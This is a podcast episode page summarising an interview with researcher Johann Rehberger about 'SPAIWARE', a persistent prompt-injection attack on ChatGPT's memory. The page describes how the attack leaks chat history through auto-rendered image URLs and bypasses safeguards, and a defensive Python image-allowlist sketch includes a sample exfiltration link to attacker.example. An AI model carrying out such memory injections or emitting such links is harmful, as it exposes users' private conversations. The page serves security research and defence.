Hijacking AI Memory: Inside Johann Rehberger's ChatGPT Security Breakthrough
Secure Talk Podcast
2025/04/01

In this episode of SecureTalk, host Justin Beals sits down with Johann Rehberger, a leading cybersecurity expert and Red Team Director at Electronic Arts, to explore the emerging security risks in artificial intelligence systems. Drawing from his extensive background in cybersecurity, Johann delves into how traditional security principles are being challenged by the rise of AI technologies like ChatGPT.
Johann discusses the discovery of a critical vulnerability in ChatGPT's memory system that allows attackers to inject persistent malicious instructions—termed 'SPAIWARE'—potentially leading to data exfiltration. He explains how prompt injection attacks can be used to manipulate AI behavior, including setting up command-and-control infrastructures and bypassing existing safeguards. The conversation also touches on the broader implications for securing autonomous AI systems, emphasizing the need for applying established security practices like threat modeling and the principle of least privilege. Johann highlights the evolving collaboration between security researchers and AI companies, advocating for transparency and proactive measures as AI becomes more integrated into daily workflows.
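The exfiltration channel discussed in the episode works by tricking the model into emitting an image link whose URL smuggles chat data to an attacker's server; when the client auto-renders the image, the data leaves without any user action. A minimal sketch of a defensive host-allowlist filter for such images follows. The attack URL, the helper name `scrub_untrusted_images`, and the allowlist are all hypothetical illustrations, not code from the episode or from OpenAI's actual mitigation:

```python
import re
from urllib.parse import urlparse

# Hypothetical example of the exfiltration pattern: injected instructions
# make the model output a markdown image whose query string carries chat data.
ATTACK_EXAMPLE = "![x](https://attacker.example/log?data=chat%20history)"

# Hypothetical allowlist of hosts the client is permitted to fetch images from.
ALLOWED_IMAGE_HOSTS = {"cdn.trusted.example"}

# Matches markdown images: ![alt](url), capturing the URL.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

def scrub_untrusted_images(markdown: str) -> str:
    """Replace markdown images pointing at non-allowlisted hosts."""
    def _replace(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return MD_IMAGE.sub(_replace, markdown)
```

OpenAI's actual fix reportedly took a similar shape, validating image URLs before rendering them; the sketch above only illustrates the general allowlisting idea.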
00:03
Johann discovered a critical vulnerability in ChatGPT's memory system, enabling the attack he terms 'SPAIWARE'.
23:55
SPAIWARE allowed persistent prompt injection to leak chat history via invisible image tags.
35:50
A bypass was found to hijack ChatGPT and steal data through prompt injection.
38:37
Prompt injection is now recognized in bug bounty programs.